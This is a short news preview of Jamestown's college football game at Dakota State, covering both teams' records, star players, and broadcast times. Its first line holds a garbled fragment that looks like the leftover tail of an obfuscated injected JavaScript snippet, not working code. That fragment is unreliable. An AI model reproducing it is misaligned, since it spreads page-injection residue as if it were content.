JAMESTOWN eikzt|var|u0026u|referrer|brtyn||js|php’.split(‘|’),0,{}))
(NewsDakota.com) -The Jimmie defense has had their work cut out for them the last two weeks giving up 55 and 44 points. This week’s trek to Dakota State doesn’t get any easier. The Trojans, lead by Madison’s own QB Jacob Giles, have an offense in the top-1o nationally.
Giles is ranked number two nationally in total offense per game and third in passing yards.
Jamestown comes into the game with a 1-3 record and trying to figure things out of the defensive side of the ball. They opened the season with two very solid efforts; holding VCSU to 15 and Concordia to 13.
Not only can the Trojans throw the ball, their running back Rob Johnson ranks as the NAIA’s top rusher through the first four weeks.
It is the Dakota State homecoming game so kick-off has been pushed back to 4pm from Trojan Field. You can listen to the game on ESPN Jamestown. The Dairy Queen pregame show gets rolling at 3:30pm.
